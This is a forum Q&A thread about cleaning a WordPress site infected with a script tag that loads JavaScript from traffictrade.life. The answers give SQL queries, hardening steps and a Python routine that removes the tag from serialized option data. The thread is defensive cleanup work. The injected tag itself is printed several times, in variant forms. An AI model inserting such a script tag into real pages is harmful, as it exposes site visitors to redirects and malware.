Jason Sprague

Reputation: 85

WordPress site infected with malware

A WordPress site my company built a few years ago looks like it is infected with malware. What should we do to filter out the malware from the site and prevent this from happening again? Any suggestions greatly appreciated.

It looks like everywhere there is an image file embedded, this piece of code is embedded:

<script src='https://traffictrade.life/scripts.js' type='text/javascript'></script>

Thanks

Upvotes: 2

Views: 7808

Answers (3)

Ian Zammit

Reputation: 23

I know this thread is pretty old, but like one of the comments above, I found the injection in the options table.

Before doing anything, back up your database!

SELECT * FROM wp_options WHERE option_value LIKE '%traffictrade%'

This will bring you a set of results; the injected script is in a serialized format.

;s:22:"tds_logo_menu_upload_r";s:0:"";s:22:"tds_footer_logo_upload";s:0:"";s:29:"tds_footer_retina_logo_upload";s:0:"";s:25:"tds_site_background_image";s:60:"http://www.domain.co.uk/wp-content/uploads/2016/05/BG.png";s:6:"td_ads";a:8:{s:6:"header";a:6:{s:7:"ad_code";s:87:"<script src='https://traffictrade.life/scripts.js' type='text/javascript'></script>";s:9:"disable_m";s:0:"";s:10:"disable_tl";s:0:"";s:10:"disable_tp";s:0:"";s:9:"disable_p";s:0:"";

Notice the traffictrade.life/scripts.js reference in the code (the script tag has been stripped for security from the website).

Remove the script from any results that contain it and save; this stopped my website being redirected.

Upvotes: 0

Muhammad Salman

Reputation: 81

Actually, I have faced this issue on my 100+ WordPress websites. I implemented the following security measures on all my websites:

  • Delete inactive plugins
  • Delete inactive themes
  • Update WP itself
  • Update all active plugins
  • Relocate wp-config.php and include the path in the actual wp-config.php
  • Add WP-hide login to change wp-admin to whatever the user wishes.
  • Add limit-login-attempts to limit the number of attempts.
  • Move the plugins folder to the root and rename it too. Also replace all occurrences of /wp-content/ with the new location throughout the database.
  • Change the wp-content directory name to something else and replace all occurrences of /wp-content/ with the new location throughout the database.

Please use this tool to search and replace, as values may exist in the _options table in serialised form: https://interconnectit.com/products/search-and-replace-for-wordpress-databases/

The following are the possible forms in which this malware exists:

<script src='\''https://traffictrade.life/scripts.js'\'' type='\''text/javascript'\''></script>

<script src="https://traffictrade.life/scripts.js" type="text/javascript"></script>

<script src="https://traffictrade.life/scripts.js" type="mce-mce-mce-text/javascript"></script>

<script src="https://traffictrade.life/scripts.js" type="mce-mce-text/javascript"></script>

<script src="https://traffictrade.life/scripts.js" type="mce-text/javascript"></script>

Hopefully this may help.

Upvotes: 2
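The two answers above both note that the wp_options copy of the tag sits inside PHP-serialized data, where every string carries a byte-length prefix (the s:87 in the quoted row); deleting the tag without updating that prefix makes PHP's unserialize() return false for the whole option. The following is an added example, not code from any poster in this thread, that removes the tag and recomputes the prefixes; the function name and the sample blob are constructed for illustration.

```python
import re

# The injected tag in the quoting variants listed on this page, including
# backslash-escaped quotes and the "mce-" prefixed type values.
INJECTED = re.compile(
    rb"<script\s+src=\\?['\"]https://traffictrade\.life/scripts\.js\\?['\"]"
    rb"[^>]*>\s*</script>", re.I)
STR_TOKEN = re.compile(rb's:(\d+):"')


def clean_serialized(blob):
    """Strip the injected tag from each s:N:"..." value and recompute N.

    Returns (cleaned_blob, tags_removed). PHP counts N in bytes, so the
    blob is handled as bytes throughout.
    """
    out, pos, removed = bytearray(), 0, 0
    while pos < len(blob):
        m = STR_TOKEN.match(blob, pos)
        if not m:
            out.append(blob[pos])  # structural byte: a:, i:, {, }, ;
            pos += 1
            continue
        start = m.end()
        end = start + int(m.group(1))
        if blob[end:end + 2] != b'";':
            raise ValueError(f"bad length prefix at offset {pos}")
        value, n = INJECTED.subn(b"", blob[start:end])
        removed += n
        out += b's:%d:"%s";' % (len(value), value)
        pos = end + 2
    return bytes(out), removed


# Constructed sample shaped like the td_ads entry quoted above (not real data).
TAG = (b"<script src='https://traffictrade.life/scripts.js'"
       b" type='text/javascript'></script>")
SAMPLE = b'a:2:{s:7:"ad_code";s:%d:"%s";s:9:"disable_m";s:0:"";}' % (len(TAG), TAG)

if __name__ == "__main__":
    cleaned, count = clean_serialized(SAMPLE)
    print(count, cleaned.decode())
```

Run it against a database backup first, and write a value back only when the returned count is non-zero.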

Gandhi

Reputation: 21

There is a malware that appeared some days ago. It also affected one of my old client sites.

It is affecting pretty much all the posts and pages of the site.

If you look at the post_content of all entries in the wp_posts table of your database, you will see that there is this new script tag

<script src='https://traffictrade.life/scripts.js' type='text/javascript'></script>

In order to easily remove this malware, use this query:

UPDATE wp_posts SET post_content = REPLACE(post_content, '<script src=\'https://traffictrade.life/scripts.js\' type=\'text/javascript\'></script>', '') WHERE INSTR(post_content, '<script src=\'https://traffictrade.life/scripts.js\' type=\'text/javascript\'></script>') > 0;

If you are using a caching plugin, make sure you clear your cache.

Hope this helps

Upvotes: 2